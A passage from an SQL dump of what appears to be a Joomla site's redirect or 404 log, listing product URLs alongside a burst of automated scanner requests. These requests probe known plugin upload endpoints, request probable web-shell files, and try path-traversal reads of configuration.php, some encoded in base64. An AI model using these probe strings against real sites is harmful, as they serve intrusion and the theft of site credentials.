00:00:00',301),(19387,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',1,0,'2018-04-12 00:34:33','0000-00-00 00:00:00',301),(19388,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-50',NULL,'','',3,0,'2018-04-12 01:10:33','0000-00-00 00:00:00',301),(19389,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,ordering/results,1-50',NULL,'','',5,0,'2018-04-12 02:18:03','0000-00-00 00:00:00',301),(19390,'http://3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/en/component/virtuemart/led-paneller/led-panel-sıvaustu/dirdesc?itemid=116',NULL,'','',4,0,'2018-04-12 02:51:23','0000-00-00 00:00:00',301),(19391,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_name/results,1-5',NULL,'','',4,0,'2018-04-12 03:25:33','0000-00-00 00:00:00',301),(19392,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_sku/results,1-5',NULL,'','',1,0,'2018-04-12 04:10:33','0000-00-00 00:00:00',301),(19393,'http://3s-technologies.com.tr/tr/modules/simpleslideshow/uploadimage.php',NULL,'http://3s-technologies.com.tr/tr/modules/simpleslideshow/uploadimage.php','',1,0,'2018-04-12 05:40:01','0000-00-00 00:00:00',301),(19394,'http://3s-technologies.com.tr/tr/modules/productpageadverts/uploadimage.php',NULL,'http://3s-technologies.com.tr/tr/modules/productpageadverts/uploadimage.php','',1,0,'2018-04-12 05:40:05','0000-00-00 00:00:00',301),(19395,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,category_name/results,1-5',NULL,'','',4,0,'2018-04-12 06:25:33','0000-00-00 00:00:00',301),(19396,'http://www.3s-technologies.com.tr/en/wp-content/plugins/asset-manager/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/asset-manager/readme.txt','',1,0,'2018-04-12 07:57:40','0000-00-00 00:00:00',301),(19397,'http://3s-technologies.com.tr/en/modules/productpageadverts/uploadimage.php',NULL,'http://3s-technologies.com.tr/modules/productpageadverts/uploadimage.php','',1,0,'2018-04-12 08:44:43','0000-00-00 00:00:00',301),(19398,'http://3s-technologies.com.tr/en/modules/simpleslideshow/uploadimage.php',NULL,'http://3s-technologies.com.tr/modules/simpleslideshow/uploadimage.php','',1,0,'2018-04-12 08:44:43','0000-00-00 00:00:00',301),(19399,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc',NULL,'','',4,0,'2018-04-12 09:03:02','0000-00-00 00:00:00',301),(19400,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name/results,1-5',NULL,'','',3,0,'2018-04-12 09:48:02','0000-00-00 00:00:00',301),(19401,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_sku/results,1-10',NULL,'','',1,0,'2018-04-12 10:37:27','0000-00-00 00:00:00',301),(19402,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer',NULL,'','',2,0,'2018-04-12 10:55:31','0000-00-00 00:00:00',301),(19403,'http://3s-technologies.com.tr/tr/xxx.php',NULL,'','',246,0,'2018-04-12 12:50:21','0000-00-00 00:00:00',301),(19404,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/dirdesc',NULL,'','',3,0,'2018-04-12 13:19:36','0000-00-00 00:00:00',301),(19405,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_sku/results,1-50',NULL,'','',2,0,'2018-04-12 13:30:22','0000-00-00 00:00:00',301),(19406,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_sku/results,1-20',NULL,'','',1,0,'2018-04-12 14:46:25','0000-00-00 00:00:00',301),(19407,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/results,1-5',NULL,'','',2,0,'2018-04-12 15:06:25','0000-00-00 00:00:00',301),(19408,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,ordering',NULL,'','',1,0,'2018-04-12 16:12:56','0000-00-00 00:00:00',301),(19409,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/users-component/index.php/en/using-joomla/extensions/components/users-component/',NULL,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/','',13,0,'2018-04-13 05:22:35','0000-00-00 00:00:00',301),(19410,'http://3s-technologies.com.tr/tr/sites/default/files/up.php',NULL,'http://3s-technologies.com.tr/tr/sites/default/files/up.php','',3,0,'2018-04-13 07:00:05','0000-00-00 00:00:00',301),(19411,'http://3s-technologies.com.tr/tr/sites/default/files/up.php',NULL,'http://3s-technologies.com.tr/tr/sites/default/files/up.php','',1,0,'2018-04-13 07:00:05','0000-00-00 00:00:00',301),(19412,'http://3s-technologies.com.tr/en/sites/default/files/up.php',NULL,'http://3s-technologies.com.tr/sites/default/files/up.php','',4,0,'2018-04-13 10:05:46','0000-00-00 00:00:00',301),(19413,'http://3s-technologies.com.tr/tr/wolf.php',NULL,'','',7,0,'2018-04-13 10:07:46','0000-00-00 00:00:00',301),(19414,'http://3s-technologies.com.tr/tr/xbrang.html',NULL,'','',2,0,'2018-04-13 10:07:47','0000-00-00 00:00:00',301),(19415,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2018-04-13 15:36:32','0000-00-00 00:00:00',301),(19416,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component/users',NULL,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component/users','',53,0,'2018-04-14 00:12:06','0000-00-00 00:00:00',301),(19417,'http://3s-technologies.com.tr/tr/wp-content/plugins/dzs-zoomsounds/admin/upload.php',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/dzs-zoomsounds/admin/upload.php','',3,0,'2018-04-14 12:04:58','0000-00-00 00:00:00',301),(19418,'http://3s-technologies.com.tr/en/wp-content/plugins/dzs-zoomsounds/admin/upload.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/dzs-zoomsounds/admin/upload.php','',1,0,'2018-04-14 15:19:58','0000-00-00 00:00:00',301),(19419,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,`p`.product_sku/dirdesc/results,1-10?language=en-gb',NULL,'','',1,0,'2018-04-15 03:00:45','0000-00-00 00:00:00',301),(19420,'https://www.3s-technologies.com.tr/en/products/screen-printer/sp-18p-l-detail',NULL,'','',2,0,'2018-04-15 11:25:01','0000-00-00 00:00:00',301),(19421,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/dirdesc/results,6-15?language=en-gb',NULL,'','',5,0,'2018-04-15 13:22:49','0000-00-00 00:00:00',301),(19422,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/results,1-10',NULL,'','',1,0,'2018-04-15 16:22:48','0000-00-00 00:00:00',301),(19423,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-5',NULL,'','',1,0,'2018-04-15 17:49:12','0000-00-00 00:00:00',301),(19424,'http://3s-technologies.com.tr/en/products/manufacturer/dalga-lehim/by,product_name/dirdesc/results,1-20?language=en-gb',NULL,'','',1,0,'2018-04-15 18:25:12','0000-00-00 00:00:00',301),(19425,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_sku/results,1-20?language=en-gb',NULL,'','',6,0,'2018-04-15 20:49:12','0000-00-00 00:00:00',301),(19426,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/en/component/virtuemart/led-paneller/led-panel-sıvaustu/dirdesc?itemid=116',NULL,'','',1,0,'2018-04-15 21:33:08','0000-00-00 00:00:00',301),(19427,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_sku/results,1-20',NULL,'','',1,0,'2018-04-15 22:22:47','0000-00-00 00:00:00',301),(19428,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/results,1-50',NULL,'','',1,0,'2018-04-15 22:51:35','0000-00-00 00:00:00',301),(19429,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name/results,1-20',NULL,'','',3,0,'2018-04-16 00:46:47','0000-00-00 00:00:00',301),(19430,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name/dirdesc/results,6-15?language=en-gb',NULL,'','',5,0,'2018-04-16 01:44:23','0000-00-00 00:00:00',301),(19431,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/bot.php3.g',NULL,'','',6,0,'2018-04-16 01:52:01','0000-00-00 00:00:00',301),(19432,'http://3s-technologies.com.tr/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writetofile.php',NULL,'','',10,0,'2018-04-16 01:52:21','0000-00-00 00:00:00',301),(19433,'http://3s-technologies.com.tr/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writetofile.php',NULL,'','',5,0,'2018-04-16 01:52:29','0000-00-00 00:00:00',301),(19434,'http://3s-technologies.com.tr/components/com_jbcatalog/libraries/jsupload/server/php/',NULL,'','',7,0,'2018-04-16 01:52:37','0000-00-00 00:00:00',301),(19435,'http://3s-technologies.com.tr/tr/components/com_jbcatalog/libraries/jsupload/server/php/files/error.php',NULL,'','',5,0,'2018-04-16 01:52:43','0000-00-00 00:00:00',301),(19436,'http://3s-technologies.com.tr/modules/mod_socialpinboard_menu/saveimagefromupload.php',NULL,'','',6,0,'2018-04-16 01:52:46','0000-00-00 00:00:00',301),(19437,'http://3s-technologies.com.tr/tr/modules/mod_socialpinboard_menu/images/socialpinboard/temp/error.php',NULL,'','',3,0,'2018-04-16 01:52:51','0000-00-00 00:00:00',301),(19438,'http://3s-technologies.com.tr/tr/tmp/plupload/rxr.php',NULL,'','',6,0,'2018-04-16 01:53:00','0000-00-00 00:00:00',301),(19439,'http://3s-technologies.com.tr/com_sexycontactform/fileupload/index.php',NULL,'','',8,0,'2018-04-16 01:53:11','0000-00-00 00:00:00',301),(19440,'http://3s-technologies.com.tr/tr/com_sexycontactform/fileupload/files/error.php',NULL,'','',5,0,'2018-04-16 01:53:17','0000-00-00 00:00:00',301),(19441,'http://3s-technologies.com.tr/tr/xx.php.xxxjpg',NULL,'','',9,0,'2018-04-16 01:53:25','0000-00-00 00:00:00',301),(19442,'http://3s-technologies.com.tr/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',28,0,'2018-04-16 01:53:27','0000-00-00 00:00:00',301),(19443,'http://3s-technologies.com.tr/tr/images/stories/xx.php.xxxjpg',NULL,'','',12,0,'2018-04-16 01:53:33','0000-00-00 00:00:00',301),(19444,'http://3s-technologies.com.tr/administrator/components/com_simplephotogallery/lib/uploadfile.php',NULL,'','',7,0,'2018-04-16 01:53:35','0000-00-00 00:00:00',301),(19445,'http://3s-technologies.com.tr/administrator/components/com_extplorer/uploadhandler.php',NULL,'','',29,0,'2018-04-16 01:53:44','0000-00-00 00:00:00',301),(19446,'http://3s-technologies.com.tr/modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/\"',NULL,'','',6,0,'2018-04-16 01:53:52','0000-00-00 00:00:00',301),(19447,'http://3s-technologies.com.tr/tr/modules/megamenu/uploadify/error.php',NULL,'','',5,0,'2018-04-16 01:53:56','0000-00-00 00:00:00',301),(19448,'http://3s-technologies.com.tr/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',37,0,'2018-04-16 01:53:57','0000-00-00 00:00:00',301),(19449,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/error.php',NULL,'','',5,0,'2018-04-16 01:53:58','0000-00-00 00:00:00',301),(19450,'http://3s-technologies.com.tr/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',8,0,'2018-04-16 01:54:01','0000-00-00 00:00:00',301),(19451,'http://3s-technologies.com.tr/tr/administrator/components/com_bt_portfolio/error.php',NULL,'','',5,0,'2018-04-16 01:54:06','0000-00-00 00:00:00',301),(19452,'http://3s-technologies.com.tr/tr/jwallpapers_files/plupload/error.php',NULL,'','',5,0,'2018-04-16 01:54:24','0000-00-00 00:00:00',301),(19453,'http://3s-technologies.com.tr/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php?name=izo.php',NULL,'','',6,0,'2018-04-16 01:54:28','0000-00-00 00:00:00',301),(19454,'http://3s-technologies.com.tr/tr/administrator/components/com_redmystic/chart/tmp-upload-images/izo.php',NULL,'','',6,0,'2018-04-16 01:54:29','0000-00-00 00:00:00',301),(19455,'http://3s-technologies.com.tr/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',29,0,'2018-04-16 01:54:30','0000-00-00 00:00:00',301),(19456,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/error.php',NULL,'','',5,0,'2018-04-16 01:54:30','0000-00-00 00:00:00',301),(19457,'http://3s-technologies.com.tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',6,0,'2018-04-16 01:54:32','0000-00-00 00:00:00',301),(19458,'http://3s-technologies.com.tr/tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/tmp-upload-images/izoc.php',NULL,'','',6,0,'2018-04-16 01:54:36','0000-00-00 00:00:00',301),(19459,'http://3s-technologies.com.tr/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',5,0,'2018-04-16 01:54:40','0000-00-00 00:00:00',301),(19460,'http://3s-technologies.com.tr/tr/administrator/components/com_maian15/charts/tmp-upload-images/izoc.php',NULL,'','',5,0,'2018-04-16 01:54:44','0000-00-00 00:00:00',301),(19461,'http://3s-technologies.com.tr/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',7,0,'2018-04-16 01:54:48','0000-00-00 00:00:00',301),(19462,'http://3s-technologies.com.tr/tr/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/izoc.php',NULL,'','',6,0,'2018-04-16 01:54:49','0000-00-00 00:00:00',301),(19463,'http://3s-technologies.com.tr/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',6,0,'2018-04-16 01:54:51','0000-00-00 00:00:00',301),(19464,'http://3s-technologies.com.tr/tr/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/izoc.php',NULL,'','',6,0,'2018-04-16 01:54:51','0000-00-00 00:00:00',301),(19465,'http://3s-technologies.com.tr/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',6,0,'2018-04-16 01:54:52','0000-00-00 00:00:00',301),(19466,'http://3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/tmp-upload-images/izoc.php',NULL,'','',6,0,'2018-04-16 01:54:52','0000-00-00 00:00:00',301),(19467,'http://3s-technologies.com.tr/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',6,0,'2018-04-16 01:54:53','0000-00-00 00:00:00',301),(19468,'http://3s-technologies.com.tr/tr/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/izoc.php',NULL,'','',6,0,'2018-04-16 01:54:57','0000-00-00 00:00:00',301),(19469,'http://3s-technologies.com.tr/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',6,0,'2018-04-16 01:55:00','0000-00-00 00:00:00',301),(19470,'http://3s-technologies.com.tr/tr/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/izoc.php',NULL,'','',6,0,'2018-04-16 01:55:06','0000-00-00 00:00:00',301),(19471,'http://3s-technologies.com.tr/tr/modules/mod_dvfoldercontent/download.php?f=li4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',5,0,'2018-04-16 01:55:14','0000-00-00 00:00:00',301),(19472,'http://3s-technologies.com.tr/tr/plugins/content/jw_allvideos/includes/download.php?file=../../../../configuration.php',NULL,'','',5,0,'2018-04-16 01:55:16','0000-00-00 00:00:00',301),(19473,'http://3s-technologies.com.tr/tr/?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&itemid=1',NULL,'','',7,0,'2018-04-16 01:55:16','0000-00-00 00:00:00',301),(19474,'http://3s-technologies.com.tr/tr/?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',37,0,'2018-04-16 01:55:19','0000-00-00 00:00:00',301),(19475,'http://3s-technologies.com.tr/tr/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',8,0,'2018-04-16 01:55:20','0000-00-00 00:00:00',301),(19476,'http://3s-technologies.com.tr/tr/?option=com_community&view=groups&groupid=1&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&itemid=0',NULL,'','',5,0,'2018-04-16 01:55:22','0000-00-00 00:00:00',301),(19477,'http://3s-technologies.com.tr/tr/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes',NULL,'','',8,0,'2018-04-16 01:55:23','0000-00-00 00:00:00',301),(19478,'http://3s-technologies.com.tr/tr/plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',56,0,'2018-04-16 01:55:26','0000-00-00 00:00:00',301),(19479,'http://3s-technologies.com.tr/tr/plugins/content/wd/wddownload.php?download=wddownload.php&file=../../../configuration.php',NULL,'','',8,0,'2018-04-16 01:55:27','0000-00-00 00:00:00',301),(19480,'http://3s-technologies.com.tr/assets/ckeditor/kcfinder/upload.php',NULL,'','',4,0,'2018-04-16 01:55:39','0000-00-00 00:00:00',301),(19481,'http://3s-technologies.com.tr/tr/assets/ckeditor/kcfinder/upload/files/priv.php.jd',NULL,'','',3,0,'2018-04-16 01:55:40','0000-00-00 00:00:00',301),(19482,'http://3s-technologies.com.tr/assets/admin/ckeditor/kcfinder/upload.php',NULL,'','',3,0,'2018-04-16 01:55:41','0000-00-00 00:00:00',301),(19483,'http://3s-technologies.com.tr/tr/assets/admin/ckeditor/kcfinder/upload/files/priv.php.jd',NULL,'','',3,0,'2018-04-16 01:55:44','0000-00-00 00:00:00',301),(19484,'http://3s-technologies.com.tr/assets/plugins/ckeditor/kcfinder/upload.php',NULL,'','',3,0,'2018-04-16 01:55:47','0000-00-00 00:00:00',301),(19485,'http://3s-technologies.com.tr/tr/assets/plugins/ckeditor/kcfinder/upload/files/priv.php.jd',NULL,'','',3,0,'2018-04-16 01:55:48','0000-00-00 00:00:00',301),(19486,'http://3s-technologies.com.tr/admin/ckeditor/kcfinder/upload.php',NULL,'','',3,0,'2018-04-16 01:55:48','0000-00-00 00:00:00',301),(19487,'http://3s-technologies.com.tr/tr/admin/ckeditor/kcfinder/upload/files/priv.php.jd',NULL,'','',3,0,'2018-04-16 01:55:49','0000-00-00 00:00:00',301),(19488,'http://3s-technologies.com.tr/libraries/jscripts/kcfinder/upload.php',NULL,'','',3,0,'2018-04-16 01:55:50','0000-00-00 00:00:00',301),(19489,'http://3s-technologies.com.tr/tr/libraries/jscripts/kcfinder/upload/files/priv.php.jd',NULL,'','',3,0,'2018-04-16 01:55:51','0000-00-00 00:00:00',301),(19490,'http://3s-technologies.com.tr/ckeditor/kcfinder/upload.php',NULL,'','',3,0,'2018-04-16 01:55:52','0000-00-00 00:00:00',301),(19491,'http://3s-technologies.com.tr/tr/ckeditor/kcfinder/upload/files/priv.php.jd',NULL,'','',3,0,'2018-04-16 01:55:52','0000-00-00 00:00:00',301),(19492,'http://3s-technologies.com.tr/js/ckeditor/kcfinder/upload.php',NULL,'','',3,0,'2018-04-16 01:55:54','0000-00-00 00:00:00',301),(19493,'http://3s-technologies.com.tr/tr/js/ckeditor/kcfinder/upload/files/priv.php.jd',NULL,'','',3,0,'2018-04-16 01:55:55','0000-00-00 00:00:00',301),(19494,'http://3s-technologies.com.tr/scripts/jquery/kcfinder/upload.php',NULL,'','',3,0,'2018-04-16 01:55:56','0000-00-00 00:00:00',301),(19495,'http://3s-technologies.com.tr/tr/scripts/jquery/kcfinder/upload/files/priv.php.jd',NULL,'','',3,0,'2018-04-16 01:55:57','0000-00-00 00:00:00',301),(19496,'http://3s-technologies.com.tr/kcfinder-2.51/upload.php',NULL,'','',3,0,'2018-04-16 01:56:00','0000-00-00 00:00:00',301),(19497,'http://3s-technologies.com.tr/tr/kcfinder-2.51/upload/files/priv.php.jd',NULL,'','',3,0,'2018-04-16 01:56:01','0000-00-00 00:00:00',301),(19498,'http://3s-technologies.com.tr/assets/js/mylibs/kcfinder/upload.php',NULL,'','',3,0,'2018-04-16 01:56:02','0000-00-00 00:00:00',301),(19499,'http://3s-technologies.com.tr/tr/assets/js/mylibs/kcfinder/upload/files/priv.php.jd',NULL,'','',3,0,'2018-04-16 01:56:02','0000-00-00 00:00:00',301),(19500,'http://3s-technologies.com.tr/tpl/plugins/upload9.1.0/server/php/',NULL,'','',4,0,'2018-04-16 01:56:03','0000-00-00 00:00:00',301),(19501,'http://3s-technologies.com.tr/tr/tpl/plugins/upload9.1.0/server/php',NULL,'','',2,0,'2018-04-16 01:56:04','0000-00-00 00:00:00',301),(19502,'http://3s-technologies.com.tr/themes/dashboard/assets/plugins/jquery-file-upload/server/php/',NULL,'','',2,0,'2018-04-16 01:56:06','0000-00-00 00:00:00',301),(19503,'http://3s-technologies.com.tr/tr/tpl/plugins/upload9.1.0/server/php/ddd.php',NULL,'','',2,0,'2018-04-16 01:56:06','0000-00-00 00:00:00',301),(19504,'http://3s-technologies.com.tr/admin/tinymce/jscripts/tiny_mce/plugins/imgsurfer/main.php',NULL,'','',2,0,'2018-04-16 01:56:09','0000-00-00 00:00:00',301),(19505,'http://3s-technologies.com.tr/tr/admin/tinymce/jscripts/tiny_mce/plugins/imgsurfer/imglist.php',NULL,'','',2,0,'2018-04-16 01:56:13','0000-00-00 00:00:00',301),(19506,'http://3s-technologies.com.tr/js/tinymce/plugins/imgsurfer/main.php',NULL,'','',2,0,'2018-04-16 01:56:14','0000-00-00 00:00:00',301),(19507,'http://3s-technologies.com.tr/tr/js/tinymce/plugins/imgsurfer/imglist.php',NULL,'','',2,0,'2018-04-16 01:56:15','0000-00-00 00:00:00',301),(19508,'http://3s-technologies.com.tr/admin/js/tinymce/plugins/imgsurfer/main.php',NULL,'','',2,0,'2018-04-16 01:56:15','0000-00-00 00:00:00',301),(19509,'http://3s-technologies.com.tr/tr/admin/js/tinymce/plugins/imgsurfer/imglist.php',NULL,'','',2,0,'2018-04-16 01:56:18','0000-00-00 00:00:00',301),(19510,'http://3s-technologies.com.tr/tinymce/plugins/imgsurfer/main.php',NULL,'','',2,0,'2018-04-16 01:56:23','0000-00-00 00:00:00',301),(19511,'http://3s-technologies.com.tr/tr/tinymce/plugins/imgsurfer/imglist.php',NULL,'','',2,0,'2018-04-16 01:56:23','0000-00-00 00:00:00',301),(19512,'http://3s-technologies.com.tr/public/js/plugins/imgsurfer/main.php',NULL,'','',2,0,'2018-04-16 01:56:24','0000-00-00 00:00:00',301),(19513,'http://3s-technologies.com.tr/tr/public/js/plugins/imgsurfer/imglist.php',NULL,'','',2,0,'2018-04-16 01:56:25','0000-00-00 00:00:00',301),(19514,'http://3s-technologies.com.tr/app/webroot/js/tinymce/plugins/imgsurfer/main.php',NULL,'','',2,0,'2018-04-16 01:56:28','0000-00-00 00:00:00',301),(19515,'http://3s-technologies.com.tr/tr/app/webroot/js/tinymce/plugins/imgsurfer/imglist.php',NULL,'','',2,0,'2018-04-16 01:56:29','0000-00-00 00:00:00',301),(19516,'http://3s-technologies.com.tr/tinymce/jscripts/tiny_mce/plugins/imgsurfer/main.php',NULL,'','',2,0,'2018-04-16 01:56:31','0000-00-00 00:00:00',301),(19517,'http://3s-technologies.com.tr/tr/tinymce/jscripts/tiny_mce/plugins/imgsurfer/imglist.php',NULL,'','',2,0,'2018-04-16 01:56:34','0000-00-00 00:00:00',301),(19518,'http://3s-technologies.com.tr/assets/tinymce/plugins/imgsurfer/main.php',NULL,'','',2,0,'2018-04-16 01:56:35','0000-00-00 00:00:00',301),(19519,'http://3s-technologies.com.tr/tr/assets/tinymce/plugins/imgsurfer/imglist.php',NULL,'','',2,0,'2018-04-16 01:56:36','0000-00-00 00:00:00',301),(19520,'http://3s-technologies.com.tr/tinymce/js/tinymce/plugins/imgsurfer/main.php',NULL,'','',2,0,'2018-04-16 01:56:36','0000-00-00 00:00:00',301),(19521,'http://3s-technologies.com.tr/tr/tinymce/js/tinymce/plugins/imgsurfer/imglist.php',NULL,'','',2,0,'2018-04-16 01:56:37','0000-00-00 00:00:00',301),(19522,'http://3s-technologies.com.tr/templates/admin/js/tinymce/plugins/imgsurfer/main.php',NULL,'','',2,0,'2018-04-16 01:56:42','0000-00-00 00:00:00',301),(19523,'http://3s-technologies.com.tr/tr/templates/admin/js/tinymce/plugins/imgsurfer/main.php/imglist.php',NULL,'','',2,0,'2018-04-16 01:56:48','0000-00-00 00:00:00',301),(19524,'http://3s-technologies.com.tr/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php',NULL,'','',2,0,'2018-04-16 01:56:49','0000-00-00 00:00:00',301),(19525,'http://3s-technologies.com.tr/tr/tinymce/plugins/ajaxfilemanager/inc/data.php',NULL,'','',2,0,'2018-04-16 01:56:52','0000-00-00 00:00:00',301),(19526,'http://3s-technologies.com.tr/tr/tinymce/plugins/ajaxfilemanager/inc/izo.php',NULL,'','',2,0,'2018-04-16 01:56:55','0000-00-00 00:00:00',301),(19527,'http://3s-technologies.com.tr/helpdesk/media/editor/plugins/filemanager/ajax_create_folder.php',NULL,'','',2,0,'2018-04-16 01:56:59','0000-00-00 00:00:00',301),(19528,'http://3s-technologies.com.tr/tr/helpdesk/media/editor/plugins/filemanager/inc/data.php',NULL,'','',2,0,'2018-04-16 01:57:00','0000-00-00 00:00:00',301),(19529,'http://3s-technologies.com.tr/tr/helpdesk/media/editor/plugins/filemanager/inc/izo.php',NULL,'','',2,0,'2018-04-16 01:57:01','0000-00-00 00:00:00',301),(19530,'http://3s-technologies.com.tr/media/editor/plugins/filemanager/ajax_create_folder.php',NULL,'','',2,0,'2018-04-16 01:57:02','0000-00-00 00:00:00',301),(19531,'http://3s-technologies.com.tr/tr/media/editor/plugins/filemanager/inc/data.php',NULL,'','',2,0,'2018-04-16 01:57:06','0000-00-00 00:00:00',301),(19532,'http://3s-technologies.com.tr/tr/media/editor/plugins/filemanager/inc/izo.php',NULL,'','',2,0,'2018-04-16 01:57:07','0000-00-00 00:00:00',301),(19533,'http://3s-technologies.com.tr/editor/plugins/filemanager/ajax_create_folder.php',NULL,'','',2,0,'2018-04-16 01:57:08','0000-00-00 00:00:00',301),(19534,'http://3s-technologies.com.tr/tr/editor/plugins/filemanager/inc/data.php',NULL,'','',2,0,'2018-04-16 01:57:08','0000-00-00 00:00:00',301),(19535,'http://3s-technologies.com.tr/tr/editor/plugins/filemanager/inc/izo.php',NULL,'','',2,0,'2018-04-16 01:57:09','0000-00-00 00:00:00',301),(19536,'http://3s-technologies.com.tr/admin/editor/plugins/filemanager/ajax_create_folder.php',NULL,'','',2,0,'2018-04-16 01:57:11','0000-00-00 00:00:00',301),(19537,'http://3s-technologies.com.tr/tr/admin/editor/plugins/filemanager/inc/data.php',NULL,'','',2,0,'2018-04-16 01:57:12','0000-00-00 00:00:00',301),(19538,'http://3s-technologies.com.tr/tr/admin/editor/plugins/filemanager/inc/izo.php',NULL,'','',2,0,'2018-04-16 01:57:13','0000-00-00 00:00:00',301),(19539,'http://3s-technologies.com.tr/modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php',NULL,'','',2,0,'2018-04-16 01:57:14','0000-00-00 00:00:00',301),(19540,'http://3s-technologies.com.tr/tr/modul/tinymce/plugins/ajaxfilemanager/inc/data.php',NULL,'','',2,0,'2018-04-16 01:57:15','0000-00-00 00:00:00',301),(19541,'http://3s-technologies.com.tr/tr/modul/tinymce/plugins/ajaxfilemanager/inc/izo.php',NULL,'','',2,0,'2018-04-16 01:57:15','0000-00-00 00:00:00',301),(19542,'http://3s-technologies.com.tr/admin/libraries/ajaxfilemanager/ajax_create_folder.php',NULL,'','',2,0,'2018-04-16 01:57:17','0000-00-00 00:00:00',301),(19543,'http://3s-technologies.com.tr/tr/admin/libraries/ajaxfilemanager/inc/data.php',NULL,'','',2,0,'2018-04-16 01:57:18','0000-00-00 00:00:00',301),(19544,'http://3s-technologies.com.tr/tr/admin/libraries/ajaxfilemanager/inc/izo.php',NULL,'','',2,0,'2018-04-16 01:57:19','0000-00-00 00:00:00',301),(19545,'http://3s-technologies.com.tr/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php',NULL,'','',2,0,'2018-04-16 01:57:20','0000-00-00 